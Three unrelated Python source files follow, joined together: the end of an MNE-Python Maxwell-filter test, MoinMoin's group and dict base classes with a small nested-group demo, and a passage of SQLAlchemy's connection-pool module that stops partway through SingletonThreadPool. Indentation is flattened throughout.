_check_reg_match(sss_py, sss_mf, 1)
# all three
sss_py = maxwell_filter(raw, coord_frame='meg', regularize='in',
calibration=tri_cal_fname,
cross_talk=tri_ctc_fname)
sss_mf = Raw(tri_sss_ctc_cal_reg_in_fname)
assert_meg_snr(sss_py, sss_mf, 0.6, 9)
_check_reg_match(sss_py, sss_mf, 1)
# tSSS
raw = Raw(tri_fname).fix_mag_coil_types()
sss_py = maxwell_filter(raw, coord_frame='meg', regularize=None,
st_duration=4., verbose=True)
assert_meg_snr(sss_py, Raw(tri_sss_st4_fname), 700., 1600)
run_tests_if_main()
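# ----------------------------------------------------------------------------
# Illustrative sketch, not part of the original test module: the basic
# public-API call pattern that the tests above exercise. It only runs when the
# file is executed directly and the MNE testing dataset has been downloaded.
if __name__ == '__main__':
    if op.isfile(raw_fname):
        raw = Raw(raw_fname, allow_maxshield='yes').crop(0., 1., copy=False)
        raw_sss = maxwell_filter(raw, origin=mf_head_origin, regularize='in')
        print(raw_sss)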
|
|
# -*- coding: iso-8859-1 -*-
"""
MoinMoin - base classes for datastructs.
@copyright: 2009 MoinMoin:DmitrijsMilajevs
@license: GPL, see COPYING for details
"""
from UserDict import DictMixin
class GroupDoesNotExistError(Exception):
"""
Raised when a group name is not found in the backend.
"""
class DictDoesNotExistError(Exception):
"""
Raised when a dict name is not found in the backend.
"""
class BaseGroup(object):
"""
Group is something which stores members. Groups are immutable. A
member is some arbitrary entity name (Unicode object).
"""
def __init__(self, request, name, backend):
"""
Initialize a group.
@param request
@param name: moin group name
@param backend: backend object which created this object
"""
self.request = request
self.name = name
self._backend = backend
def __contains__(self, member, processed_groups=None):
raise NotImplementedError()
def __iter__(self, yielded_members=None, processed_groups=None):
raise NotImplementedError()
class BaseGroupsBackend(object):
"""
Backend provides access to the group definitions for the other
MoinMoin code.
"""
def __init__(self, request):
self.request = request
self.page_group_regex = request.cfg.cache.page_group_regexact
def is_group_name(self, member):
return self.page_group_regex.match(member)
def __contains__(self, group_name):
"""
Check if a group called <group_name> is available in this backend.
"""
raise NotImplementedError()
def __iter__(self):
"""
Iterate over moin group names of the groups defined in this backend.
@return: moin group names
"""
raise NotImplementedError()
def __getitem__(self, group_name):
"""
Get a group by its moin group name.
"""
raise NotImplementedError()
def __repr__(self):
return "<%s groups=%s>" % (self.__class__, list(self))
def _retrieve_members(self, group_name):
raise NotImplementedError()
def groups_with_member(self, member):
"""
List all group names of groups containing <member>.
@param member: member name [unicode]
@return: list of group names [unicode]
"""
for group_name in self:
try:
if member in self[group_name]:
yield group_name
except GroupDoesNotExistError:
pass
def get(self, key, default=None):
"""
Return the group named <key> if key is in the backend, else
default. If default is not given, it defaults to None, so that
this method never raises a GroupDoesNotExistError.
"""
try:
return self[key]
except GroupDoesNotExistError:
return default
class LazyGroup(BaseGroup):
"""
A lazy group does not store members internally, but gets them from
a backend when needed.
Lazy group is made only of members. It cannot consist of other groups.
For instance, this is a possible LazyGroup:
PossibleGroup
* OneMember
* OtherMember
This is a group which cannot be LazyGroup:
NotPossibleGroup
* OneMember
* OtherMember
* OtherGroup
"""
def __init__(self, request, name, backend):
super(LazyGroup, self).__init__(request, name, backend)
if name not in backend:
raise GroupDoesNotExistError(name)
def __contains__(self, member, processed_groups=None):
# processed_groups are not used here but other group classes
# may expect this parameter.
return self._backend._group_has_member(self.name, member)
def __iter__(self, yielded_members=None, processed_groups=None):
# processed_groups are not used here but other group classes
# may expect this parameter.
if yielded_members is None:
yielded_members = set()
for member in self._backend._iter_group_members(self.name):
if member not in yielded_members:
yielded_members.add(member)
yield member
class LazyGroupsBackend(BaseGroupsBackend):
def _iter_group_members(self, group_name):
raise NotImplementedError()
def _group_has_member(self, group_name, member):
raise NotImplementedError()
class GreedyGroup(BaseGroup):
"""
GreedyGroup gets all members during initialization and stores them internally.
Members of a group may be names of other groups.
"""
def __init__(self, request, name, backend):
super(GreedyGroup, self).__init__(request, name, backend)
self.members, self.member_groups = self._load_group()
def _load_group(self):
"""
Retrieve group data from the backend and filter it to members and group_members.
"""
members_retrieved = set(self._backend._retrieve_members(self.name))
member_groups = set(member for member in members_retrieved if self._backend.is_group_name(member))
members = members_retrieved - member_groups
return members, member_groups
def __contains__(self, member, processed_groups=None):
"""
First check if <member> is part of this group and then check
for every subgroup in this group.
<processed_groups> is needed to avoid infinite recursion, if
groups are defined recursively.
@param member: member name [unicode]
@param processed_groups: groups which were checked for containment before [set]
"""
if processed_groups is None:
processed_groups = set()
processed_groups.add(self.name)
if member in self.members or member in self.member_groups:
return True
else:
groups = self.request.groups
for group_name in self.member_groups:
if group_name not in processed_groups and group_name in groups and groups[group_name].__contains__(member, processed_groups):
return True
return False
def __iter__(self, yielded_members=None, processed_groups=None):
"""
Iterate first over members of this group, then over subgroups of this group.
<yielded_members> and <processed_groups> are needed to avoid infinite recursion.
This can happen if there are two groups like these:
OneGroup: Something, OtherGroup
OtherGroup: OneGroup, SomethingOther
@param yielded_members: members which have been already yielded before [set]
@param processed_groups: group names which have been iterated before [set]
"""
if processed_groups is None:
processed_groups = set()
if yielded_members is None:
yielded_members = set()
processed_groups.add(self.name)
for member in self.members:
if member not in yielded_members:
yielded_members.add(member)
yield member
groups = self.request.groups
for group_name in self.member_groups:
if group_name not in processed_groups:
if group_name in groups:
for member in groups[group_name].__iter__(yielded_members, processed_groups):
yield member
else:
yield group_name
def __repr__(self):
return "<%s name=%s members=%s member_groups=%s>" % (self.__class__,
self.name,
self.members,
self.member_groups)
class BaseDict(object, DictMixin):
def __init__(self, request, name, backend):
"""
Initialize a dict. Dicts are greedy: all keys and items are
stored internally.
@param request
@param name: moin dict name
@param backend: backend object which created this object
"""
self.request = request
self.name = name
self._backend = backend
self._dict = self._load_dict()
def __iter__(self):
return self._dict.__iter__()
def keys(self):
return list(self)
def __len__(self):
return self._dict.__len__()
def __getitem__(self, key):
return self._dict[key]
def get(self, key, default=None):
"""
Return the value if key is in the dictionary, else default. If
default is not given, it defaults to None, so that this method
never raises a KeyError.
"""
return self._dict.get(key, default)
def _load_dict(self):
"""
Retrieve dict data from the backend.
"""
return self._backend._retrieve_items(self.name)
def __repr__(self):
return "<%r name=%r items=%r>" % (self.__class__, self.name, self._dict.items())
class BaseDictsBackend(object):
def __init__(self, request):
self.request = request
self.page_dict_regex = request.cfg.cache.page_dict_regexact
def is_dict_name(self, name):
return self.page_dict_regex.match(name)
def __contains__(self, dict_name):
"""
Check if a dict called <dict_name> is available in this backend.
"""
raise NotImplementedError()
def __getitem__(self, dict_name):
"""
Get a dict by its moin dict name.
"""
raise NotImplementedError()
def _retrieve_items(self, dict_name):
raise NotImplementedError()
def get(self, key, default=None):
"""
Return the dictionary named <key> if key is in the backend,
else default. If default is not given, it defaults to None, so
that this method never raises a DictDoesNotExistError.
"""
try:
return self[key]
except DictDoesNotExistError:
return default
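# Illustrative sketch, not part of MoinMoin: a minimal in-memory backend that
# shows how GreedyGroup resolves nested groups while the processed_groups set
# guards against the mutual recursion between the two demo groups below. The
# _Request/_Cfg/_Cache stubs and group names are made up purely for this demo.
if __name__ == '__main__':
    import re

    class _Cache(object):
        page_group_regexact = re.compile(r'^.+Group$')

    class _Cfg(object):
        cache = _Cache()

    class _Request(object):
        cfg = _Cfg()

    _definitions = {
        u'AdminGroup': [u'JohnDoe', u'EditorGroup'],
        u'EditorGroup': [u'JaneDoe', u'AdminGroup'],  # refers back to AdminGroup
    }

    class _MemoryBackend(BaseGroupsBackend):
        def __iter__(self):
            return iter(_definitions)

        def __contains__(self, group_name):
            return group_name in _definitions

        def __getitem__(self, group_name):
            return GreedyGroup(self.request, group_name, self)

        def _retrieve_members(self, group_name):
            return _definitions[group_name]

    request = _Request()
    backend = _MemoryBackend(request)
    request.groups = backend
    print(sorted(backend[u'AdminGroup']))        # [u'JaneDoe', u'JohnDoe']
    print(u'JaneDoe' in backend[u'AdminGroup'])  # True, found via EditorGroup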
|
|
# sqlalchemy/pool.py
# Copyright (C) 2005-2016 the SQLAlchemy authors and contributors
# <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
"""Connection pooling for DB-API connections.
Provides a number of connection pool implementations for a variety of
usage scenarios and thread behavior requirements imposed by the
application, DB-API or database itself.
Also provides a DB-API 2.0 connection proxying mechanism allowing
regular DB-API connect() methods to be transparently managed by a
SQLAlchemy connection pool.
"""
import time
import traceback
import weakref
from . import exc, log, event, interfaces, util
from .util import queue as sqla_queue
from .util import threading, memoized_property, \
chop_traceback
from collections import deque
proxies = {}
def manage(module, **params):
"""Return a proxy for a DB-API module that automatically
pools connections.
Given a DB-API 2.0 module and pool management parameters, returns
a proxy for the module that will automatically pool connections,
creating new connection pools for each distinct set of connection
arguments sent to the decorated module's connect() function.
:param module: a DB-API 2.0 database module
:param poolclass: the class used by the pool module to provide
pooling. Defaults to :class:`.QueuePool`.
:param \*\*params: will be passed through to *poolclass*
"""
try:
return proxies[module]
except KeyError:
return proxies.setdefault(module, _DBProxy(module, **params))
def clear_managers():
"""Remove all current DB-API 2.0 managers.
All pools and connections are disposed.
"""
for manager in proxies.values():
manager.close()
proxies.clear()
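# Illustrative usage sketch (not part of this module): the proxy returned by
# manage() pools connections per distinct set of connect() arguments, e.g.::
#
#     import sqlite3
#     from sqlalchemy import pool
#
#     pooled_sqlite = pool.manage(sqlite3)
#     conn = pooled_sqlite.connect(':memory:')  # transparently pooled
#     conn.close()                              # returned to the pool, not closed
#     pool.clear_managers()                     # dispose all managed pools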
reset_rollback = util.symbol('reset_rollback')
reset_commit = util.symbol('reset_commit')
reset_none = util.symbol('reset_none')
class _ConnDialect(object):
"""partial implementation of :class:`.Dialect`
which provides DBAPI connection methods.
When a :class:`.Pool` is combined with an :class:`.Engine`,
the :class:`.Engine` replaces this with its own
:class:`.Dialect`.
"""
def do_rollback(self, dbapi_connection):
dbapi_connection.rollback()
def do_commit(self, dbapi_connection):
dbapi_connection.commit()
def do_close(self, dbapi_connection):
dbapi_connection.close()
class Pool(log.Identified):
"""Abstract base class for connection pools."""
_dialect = _ConnDialect()
def __init__(self,
creator, recycle=-1, echo=None,
use_threadlocal=False,
logging_name=None,
reset_on_return=True,
listeners=None,
events=None,
_dispatch=None,
_dialect=None):
"""
Construct a Pool.
:param creator: a callable function that returns a DB-API
connection object. The function will be called with
parameters.
:param recycle: If set to a value other than -1, number of seconds between
connection recycling, which means upon checkout, if this
timeout is surpassed the connection will be closed and
replaced with a newly opened connection. Defaults to -1.
:param logging_name: String identifier which will be used within
the "name" field of logging records generated within the
"sqlalchemy.pool" logger. Defaults to a hexstring of the object's
id.
:param echo: If True, connections being pulled and retrieved
from the pool will be logged to the standard output, as well
as pool sizing information. Echoing can also be achieved by
enabling logging for the "sqlalchemy.pool"
namespace. Defaults to False.
:param use_threadlocal: If set to True, repeated calls to
:meth:`connect` within the same application thread will be
guaranteed to return the same connection object, if one has
already been retrieved from the pool and has not been
returned yet. Offers a slight performance advantage at the
cost of individual transactions by default. The
:meth:`.Pool.unique_connection` method is provided to return
a consistently unique connection to bypass this behavior
when the flag is set.
.. warning:: The :paramref:`.Pool.use_threadlocal` flag
**does not affect the behavior** of :meth:`.Engine.connect`.
:meth:`.Engine.connect` makes use of the
:meth:`.Pool.unique_connection` method which **does not use thread
local context**. To produce a :class:`.Connection` which refers
to the :meth:`.Pool.connect` method, use
:meth:`.Engine.contextual_connect`.
Note that other SQLAlchemy connectivity systems such as
:meth:`.Engine.execute` as well as the orm
:class:`.Session` make use of
:meth:`.Engine.contextual_connect` internally, so these functions
are compatible with the :paramref:`.Pool.use_threadlocal` setting.
.. seealso::
:ref:`threadlocal_strategy` - contains detail on the
"threadlocal" engine strategy, which provides a more comprehensive
approach to "threadlocal" connectivity for the specific
use case of using :class:`.Engine` and :class:`.Connection` objects
directly.
:param reset_on_return: Determine steps to take on
connections as they are returned to the pool.
reset_on_return can have any of these values:
* ``"rollback"`` - call rollback() on the connection,
to release locks and transaction resources.
This is the default value. The vast majority
of use cases should leave this value set.
* ``True`` - same as 'rollback', this is here for
backwards compatibility.
* ``"commit"`` - call commit() on the connection,
to release locks and transaction resources.
A commit here may be desirable for databases that
cache query plans if a commit is emitted,
such as Microsoft SQL Server. However, this
value is more dangerous than 'rollback' because
any data changes present on the transaction
are committed unconditionally.
* ``None`` - don't do anything on the connection.
This setting should only be made on a database
that has no transaction support at all,
namely MySQL MyISAM. By not doing anything,
performance can be improved. This
setting should **never be selected** for a
database that supports transactions,
as it will lead to deadlocks and stale
state.
* ``"none"`` - same as ``None``
.. versionadded:: 0.9.10
* ``False`` - same as None, this is here for
backwards compatibility.
.. versionchanged:: 0.7.6
:paramref:`.Pool.reset_on_return` accepts ``"rollback"``
and ``"commit"`` arguments.
:param events: a list of 2-tuples, each of the form
``(callable, target)`` which will be passed to :func:`.event.listen`
upon construction. Provided here so that event listeners
can be assigned via :func:`.create_engine` before dialect-level
listeners are applied.
:param listeners: Deprecated. A list of
:class:`~sqlalchemy.interfaces.PoolListener`-like objects or
dictionaries of callables that receive events when DB-API
connections are created, checked out and checked in to the
pool. This has been superseded by
:func:`~sqlalchemy.event.listen`.
"""
if logging_name:
self.logging_name = self._orig_logging_name = logging_name
else:
self._orig_logging_name = None
log.instance_logger(self, echoflag=echo)
self._threadconns = threading.local()
self._creator = creator
self._recycle = recycle
self._invalidate_time = 0
self._use_threadlocal = use_threadlocal
if reset_on_return in ('rollback', True, reset_rollback):
self._reset_on_return = reset_rollback
elif reset_on_return in ('none', None, False, reset_none):
self._reset_on_return = reset_none
elif reset_on_return in ('commit', reset_commit):
self._reset_on_return = reset_commit
else:
raise exc.ArgumentError(
"Invalid value for 'reset_on_return': %r"
% reset_on_return)
self.echo = echo
if _dispatch:
self.dispatch._update(_dispatch, only_propagate=False)
if _dialect:
self._dialect = _dialect
if events:
for fn, target in events:
event.listen(self, target, fn)
if listeners:
util.warn_deprecated(
"The 'listeners' argument to Pool (and "
"create_engine()) is deprecated. Use event.listen().")
for l in listeners:
self.add_listener(l)
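# A minimal construction sketch for the parameters documented above, using
# the concrete QueuePool subclass defined later in this module and sqlite3
# as an assumed DB-API driver; values are illustrative only.
#
#   import sqlite3
#   from sqlalchemy.pool import QueuePool
#
#   def make_conn():
#       return sqlite3.connect("example.db")
#
#   p = QueuePool(make_conn, recycle=3600, echo=False,
#                 reset_on_return="rollback")
#   conn = p.connect()
#   conn.close()   # rollback issued on return, then checked back in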
@property
def _creator(self):
return self.__dict__['_creator']
@_creator.setter
def _creator(self, creator):
self.__dict__['_creator'] = creator
self._invoke_creator = self._should_wrap_creator(creator)
def _should_wrap_creator(self, creator):
"""Detect if creator accepts a single argument, or is sent
as a legacy style no-arg function.
"""
try:
argspec = util.get_callable_argspec(self._creator, no_self=True)
except TypeError:
return lambda crec: creator()
defaulted = argspec[3] is not None and len(argspec[3]) or 0
positionals = len(argspec[0]) - defaulted
# look for the exact arg signature that DefaultStrategy
# sends us
if (argspec[0], argspec[3]) == (['connection_record'], (None,)):
return creator
# or just a single positional
elif positionals == 1:
return creator
# all other cases, just wrap and assume legacy "creator" callable
# thing
else:
return lambda crec: creator()
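# For clarity, the two creator call styles detected above, with purely
# illustrative names (make_dbapi_connection is a placeholder):
#
#   def legacy_creator():                          # wrapped as lambda crec: creator()
#       return make_dbapi_connection()
#
#   def record_aware_creator(connection_record):   # passed through unchanged
#       return make_dbapi_connection()
#
# Either form may be supplied as the Pool ``creator`` argument.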
def _close_connection(self, connection):
self.logger.debug("Closing connection %r", connection)
try:
self._dialect.do_close(connection)
except Exception:
self.logger.error("Exception closing connection %r",
connection, exc_info=True)
@util.deprecated(
2.7, "Pool.add_listener is deprecated. Use event.listen()")
def add_listener(self, listener):
"""Add a :class:`.PoolListener`-like object to this pool.
``listener`` may be an object that implements some or all of
PoolListener, or a dictionary of callables containing implementations
of some or all of the named methods in PoolListener.
"""
interfaces.PoolListener._adapt_listener(self, listener)
def unique_connection(self):
"""Produce a DBAPI connection that is not referenced by any
thread-local context.
This method is equivalent to :meth:`.Pool.connect` when the
:paramref:`.Pool.use_threadlocal` flag is not set to True.
When :paramref:`.Pool.use_threadlocal` is True, the
:meth:`.Pool.unique_connection` method provides a means of bypassing
the threadlocal context.
"""
return _ConnectionFairy._checkout(self)
def _create_connection(self):
"""Called by subclasses to create a new ConnectionRecord."""
return _ConnectionRecord(self)
def _invalidate(self, connection, exception=None):
"""Mark all connections established within the generation
of the given connection as invalidated.
If this pool's last invalidate time is before when the given
connection was created, update the timestamp to the current time. Otherwise,
no action is performed.
Connections with a start time prior to this pool's invalidation
time will be recycled upon next checkout.
"""
rec = getattr(connection, "_connection_record", None)
if not rec or self._invalidate_time < rec.starttime:
self._invalidate_time = time.time()
if getattr(connection, 'is_valid', False):
connection.invalidate(exception)
def recreate(self):
"""Return a new :class:`.Pool`, of the same class as this one
and configured with identical creation arguments.
This method is used in conjunction with :meth:`dispose`
to close out an entire :class:`.Pool` and create a new one in
its place.
"""
raise NotImplementedError()
def dispose(self):
"""Dispose of this pool.
This method leaves the possibility of checked-out connections
remaining open, as it only affects connections that are
idle in the pool.
See also the :meth:`Pool.recreate` method.
"""
raise NotImplementedError()
def connect(self):
"""Return a DBAPI connection from the pool.
The connection is instrumented such that when its
``close()`` method is called, the connection will be returned to
the pool.
"""
if not self._use_threadlocal:
return _ConnectionFairy._checkout(self)
try:
rec = self._threadconns.current()
except AttributeError:
pass
else:
if rec is not None:
return rec._checkout_existing()
return _ConnectionFairy._checkout(self, self._threadconns)
def _return_conn(self, record):
"""Given a _ConnectionRecord, return it to the :class:`.Pool`.
This method is called when an instrumented DBAPI connection
has its ``close()`` method called.
"""
if self._use_threadlocal:
try:
del self._threadconns.current
except AttributeError:
pass
self._do_return_conn(record)
def _do_get(self):
"""Implementation for :meth:`get`, supplied by subclasses."""
raise NotImplementedError()
def _do_return_conn(self, conn):
"""Implementation for :meth:`return_conn`, supplied by subclasses."""
raise NotImplementedError()
def status(self):
raise NotImplementedError()
class _ConnectionRecord(object):
"""Internal object which maintains an individual DBAPI connection
referenced by a :class:`.Pool`.
The :class:`._ConnectionRecord` object always exists for any particular
DBAPI connection whether or not that DBAPI connection has been
"checked out". This is in contrast to the :class:`._ConnectionFairy`
which is only a public facade to the DBAPI connection while it is checked
out.
A :class:`._ConnectionRecord` may exist for a span longer than that
of a single DBAPI connection. For example, if the
:meth:`._ConnectionRecord.invalidate`
method is called, the DBAPI connection associated with this
:class:`._ConnectionRecord`
will be discarded, but the :class:`._ConnectionRecord` may be used again,
in which case a new DBAPI connection is produced when the :class:`.Pool`
next uses this record.
The :class:`._ConnectionRecord` is delivered along with connection
pool events, including :meth:`.PoolEvents.connect` and
:meth:`.PoolEvents.checkout`, however :class:`._ConnectionRecord` still
remains an internal object whose API and internals may change.
.. seealso::
:class:`._ConnectionFairy`
"""
def __init__(self, pool):
self.__pool = pool
self.__connect(first_connect_check=True)
self.finalize_callback = deque()
connection = None
"""A reference to the actual DBAPI connection being tracked.
May be ``None`` if this :class:`._ConnectionRecord` has been marked
as invalidated; a new DBAPI connection may replace it if the owning
pool calls upon this :class:`._ConnectionRecord` to reconnect.
"""
_soft_invalidate_time = 0
@util.memoized_property
def info(self):
"""The ``.info`` dictionary associated with the DBAPI connection.
This dictionary is shared among the :attr:`._ConnectionFairy.info`
and :attr:`.Connection.info` accessors.
"""
return {}
@classmethod
def checkout(cls, pool):
rec = pool._do_get()
try:
dbapi_connection = rec.get_connection()
except:
with util.safe_reraise():
rec.checkin()
echo = pool._should_log_debug()
fairy = _ConnectionFairy(dbapi_connection, rec, echo)
rec.fairy_ref = weakref.ref(
fairy,
lambda ref: _finalize_fairy and
_finalize_fairy(
dbapi_connection,
rec, pool, ref, echo)
)
_refs.add(rec)
if echo:
pool.logger.debug("Connection %r checked out from pool",
dbapi_connection)
return fairy
def checkin(self):
self.fairy_ref = None
connection = self.connection
pool = self.__pool
while self.finalize_callback:
finalizer = self.finalize_callback.pop()
finalizer(connection)
if pool.dispatch.checkin:
pool.dispatch.checkin(connection, self)
pool._return_conn(self)
def close(self):
if self.connection is not None:
self.__close()
def invalidate(self, e=None, soft=False):
"""Invalidate the DBAPI connection held by this :class:`._ConnectionRecord`.
This method is called for all connection invalidations, including
when the :meth:`._ConnectionFairy.invalidate` or
:meth:`.Connection.invalidate` methods are called, as well as when any
so-called "automatic invalidation" condition occurs.
:param e: an exception object indicating a reason for the invalidation.
:param soft: if True, the connection isn't closed; instead, this
connection will be recycled on next checkout.
.. versionadded:: 1.0.3
.. seealso::
:ref:`pool_connection_invalidation`
"""
# already invalidated
if self.connection is None:
return
if soft:
self.__pool.dispatch.soft_invalidate(self.connection, self, e)
else:
self.__pool.dispatch.invalidate(self.connection, self, e)
if e is not None:
self.__pool.logger.info(
"%sInvalidate connection %r (reason: %s:%s)",
"Soft " if soft else "",
self.connection, e.__class__.__name__, e)
else:
self.__pool.logger.info(
"%sInvalidate connection %r",
"Soft " if soft else "",
self.connection)
if soft:
self._soft_invalidate_time = time.time()
else:
self.__close()
self.connection = None
def get_connection(self):
recycle = False
if self.connection is None:
self.info.clear()
self.__connect()
elif self.__pool._recycle > -1 and \
time.time() - self.starttime > self.__pool._recycle:
self.__pool.logger.info(
"Connection %r exceeded timeout; recycling",
self.connection)
recycle = True
elif self.__pool._invalidate_time > self.starttime:
self.__pool.logger.info(
"Connection %r invalidated due to pool invalidation; " +
"recycling",
self.connection
)
recycle = True
elif self._soft_invalidate_time > self.starttime:
self.__pool.logger.info(
"Connection %r invalidated due to local soft invalidation; " +
"recycling",
self.connection
)
recycle = True
if recycle:
self.__close()
self.info.clear()
self.__connect()
return self.connection
def __close(self):
self.finalize_callback.clear()
if self.__pool.dispatch.close:
self.__pool.dispatch.close(self.connection, self)
self.__pool._close_connection(self.connection)
def __connect(self, first_connect_check=False):
pool = self.__pool
# ensure any existing connection is removed, so that if
# creator fails, this attribute stays None
self.connection = None
try:
self.starttime = time.time()
connection = pool._invoke_creator(self)
pool.logger.debug("Created new connection %r", connection)
self.connection = connection
except Exception as e:
pool.logger.debug("Error on connect(): %s", e)
raise
else:
if first_connect_check:
pool.dispatch.first_connect.\
for_modify(pool.dispatch).\
exec_once(self.connection, self)
if pool.dispatch.connect:
pool.dispatch.connect(self.connection, self)
def _finalize_fairy(connection, connection_record,
pool, ref, echo, fairy=None):
"""Cleanup for a :class:`._ConnectionFairy` whether or not it's already
been garbage collected.
"""
_refs.discard(connection_record)
if ref is not None and \
connection_record.fairy_ref is not ref:
return
if connection is not None:
if connection_record and echo:
pool.logger.debug("Connection %r being returned to pool",
connection)
try:
fairy = fairy or _ConnectionFairy(
connection, connection_record, echo)
assert fairy.connection is connection
fairy._reset(pool)
# Immediately close detached instances
if not connection_record:
if pool.dispatch.close_detached:
pool.dispatch.close_detached(connection)
pool._close_connection(connection)
except BaseException as e:
pool.logger.error(
"Exception during reset or similar", exc_info=True)
if connection_record:
connection_record.invalidate(e=e)
if not isinstance(e, Exception):
raise
if connection_record:
connection_record.checkin()
_refs = set()
class _ConnectionFairy(object):
"""Proxies a DBAPI connection and provides return-on-dereference
support.
This is an internal object used by the :class:`.Pool` implementation
to provide context management to a DBAPI connection delivered by
that :class:`.Pool`.
The name "fairy" is inspired by the fact that the
:class:`._ConnectionFairy` object's lifespan is transitory, as it lasts
only for the length of a specific DBAPI connection being checked out from
the pool, and additionally that as a transparent proxy, it is mostly
invisible.
.. seealso::
:class:`._ConnectionRecord`
"""
def __init__(self, dbapi_connection, connection_record, echo):
self.connection = dbapi_connection
self._connection_record = connection_record
self._echo = echo
connection = None
"""A reference to the actual DBAPI connection being tracked."""
_connection_record = None
"""A reference to the :class:`._ConnectionRecord` object associated
with the DBAPI connection.
This is currently an internal accessor which is subject to change.
"""
_reset_agent = None
"""Refer to an object with a ``.commit()`` and ``.rollback()`` method;
if non-None, the "reset-on-return" feature will call upon this object
rather than directly against the dialect-level do_rollback() and
do_commit() methods.
In practice, a :class:`.Connection` assigns a :class:`.Transaction` object
to this variable when one is in scope so that the :class:`.Transaction`
takes the job of committing or rolling back on return if
:meth:`.Connection.close` is called while the :class:`.Transaction`
still exists.
This is essentially an "event handler" of sorts but is simplified as an
instance variable both for performance/simplicity as well as that there
can only be one "reset agent" at a time.
"""
@classmethod
def _checkout(cls, pool, threadconns=None, fairy=None):
if not fairy:
fairy = _ConnectionRecord.checkout(pool)
fairy._pool = pool
fairy._counter = 0
if threadconns is not None:
threadconns.current = weakref.ref(fairy)
if fairy.connection is None:
raise exc.InvalidRequestError("This connection is closed")
fairy._counter += 1
if not pool.dispatch.checkout or fairy._counter != 1:
return fairy
# Pool listeners can trigger a reconnection on checkout
attempts = 2
while attempts > 0:
try:
pool.dispatch.checkout(fairy.connection,
fairy._connection_record,
fairy)
return fairy
except exc.DisconnectionError as e:
pool.logger.info(
"Disconnection detected on checkout: %s", e)
fairy._connection_record.invalidate(e)
try:
fairy.connection = \
fairy._connection_record.get_connection()
except:
with util.safe_reraise():
fairy._connection_record.checkin()
attempts -= 1
pool.logger.info("Reconnection attempts exhausted on checkout")
fairy.invalidate()
raise exc.InvalidRequestError("This connection is closed")
def _checkout_existing(self):
return _ConnectionFairy._checkout(self._pool, fairy=self)
def _checkin(self):
_finalize_fairy(self.connection, self._connection_record,
self._pool, None, self._echo, fairy=self)
self.connection = None
self._connection_record = None
_close = _checkin
def _reset(self, pool):
if pool.dispatch.reset:
pool.dispatch.reset(self, self._connection_record)
if pool._reset_on_return is reset_rollback:
if self._echo:
pool.logger.debug("Connection %s rollback-on-return%s",
self.connection,
", via agent"
if self._reset_agent else "")
if self._reset_agent:
self._reset_agent.rollback()
else:
pool._dialect.do_rollback(self)
elif pool._reset_on_return is reset_commit:
if self._echo:
pool.logger.debug("Connection %s commit-on-return%s",
self.connection,
", via agent"
if self._reset_agent else "")
if self._reset_agent:
self._reset_agent.commit()
else:
pool._dialect.do_commit(self)
@property
def _logger(self):
return self._pool.logger
@property
def is_valid(self):
"""Return True if this :class:`._ConnectionFairy` still refers
to an active DBAPI connection."""
return self.connection is not None
@util.memoized_property
def info(self):
"""Info dictionary associated with the underlying DBAPI connection
referred to by this :class:`.ConnectionFairy`, allowing user-defined
data to be associated with the connection.
The data here will follow along with the DBAPI connection including
after it is returned to the connection pool and used again
in subsequent instances of :class:`._ConnectionFairy`. It is shared
with the :attr:`._ConnectionRecord.info` and :attr:`.Connection.info`
accessors.
"""
return self._connection_record.info
def invalidate(self, e=None, soft=False):
"""Mark this connection as invalidated.
This method can be called directly, and is also called as a result
of the :meth:`.Connection.invalidate` method. When invoked,
the DBAPI connection is immediately closed and discarded from
further use by the pool. The invalidation mechanism proceeds
via the :meth:`._ConnectionRecord.invalidate` internal method.
:param e: an exception object indicating a reason for the invalidation.
:param soft: if True, the connection isn't closed; instead, this
connection will be recycled on next checkout.
.. versionadded:: 1.0.3
.. seealso::
:ref:`pool_connection_invalidation`
"""
if self.connection is None:
util.warn("Can't invalidate an already-closed connection.")
return
if self._connection_record:
self._connection_record.invalidate(e=e, soft=soft)
if not soft:
self.connection = None
self._checkin()
def cursor(self, *args, **kwargs):
"""Return a new DBAPI cursor for the underlying connection.
This method is a proxy for the ``connection.cursor()`` DBAPI
method.
"""
return self.connection.cursor(*args, **kwargs)
def __getattr__(self, key):
return getattr(self.connection, key)
def detach(self):
"""Separate this connection from its Pool.
This means that the connection will no longer be returned to the
pool when closed, and will instead be literally closed. The
containing ConnectionRecord is separated from the DB-API connection,
and will create a new connection when next used.
Note that any overall connection limiting constraints imposed by a
Pool implementation may be violated after a detach, as the detached
connection is removed from the pool's knowledge and control.
"""
if self._connection_record is not None:
rec = self._connection_record
_refs.remove(rec)
rec.fairy_ref = None
rec.connection = None
# TODO: should this be _return_conn?
self._pool._do_return_conn(self._connection_record)
self.info = self.info.copy()
self._connection_record = None
if self._pool.dispatch.detach:
self._pool.dispatch.detach(self.connection, rec)
def close(self):
self._counter -= 1
if self._counter == 0:
self._checkin()
class SingletonThreadPool(Pool):
"""A Pool that maintains one connection per thread.
Maintains one connection per each thread, never moving a connection to a
thread other than the one which it was created in.
.. warning:: the :class:`.SingletonThreadPool` will call ``.close()``
on arbitrary connections that exist beyond the size setting of
``pool_size``, e.g. if more unique **thread identities**
than what ``pool_size`` states are used. This cleanup is
non-deterministic and not sensitive to whether or not the connections
linked to those thread identities are currently in use.
:class:`.SingletonThreadPool` may be improved in a future release,
however in its current status it is generally used only for test
scenarios using a SQLite ``:memory:`` database and is not recommended
for production use.
Options are the same as those of :class:`.Pool`, as well as:
:param pool_size: The number of threads in which to maintain connections
at once. Defaults to five.
:class:`.SingletonThreadPool` is used by the SQLite dialect
automatically when a memory-based database is used.
See :ref:`sqlite_toplevel`.
"""
def __init__(self, creator, pool_size=5, **kw):
kw['use_threadlocal'] = True
Pool.__init__(self, creator, **kw)
self._conn = threading.local()
self._all_conns = set()
self.size = pool_size
def recreate(self):
self.logger.info("Pool recreating")
return self.__class__(self._creator,
pool_size=self.size,
recycle=self._recycle,
echo=self.echo,
logging_name=self._orig_logging_name,
use_threadlocal=self._use_threadlocal,
reset_on_return=self._reset_on_return,
_dispatch=self.dispatch,
_dialect=self._dialect)
def dispose(self):
"""Dispose of this pool."""
for conn in self._all_conns:
try:
conn.close()
except Exception:
# pysqlite won't even let you close a conn from a thread
# that didn't create it
pass
self._all_conns.clear()
def _cleanup(self):
while len(self._all_conns) >= self.size:
c = self._all_conns.pop()
c.close()
def status(self):
return "SingletonThreadPool id:%d size: %d" % \
(id(self), len(self._all_conns))
def _do_return_conn(self, conn):
pass
def _do_get(self):
try:
c = self._conn.current()
if c:
return c
except AttributeError:
pass
c = self._create_connection()
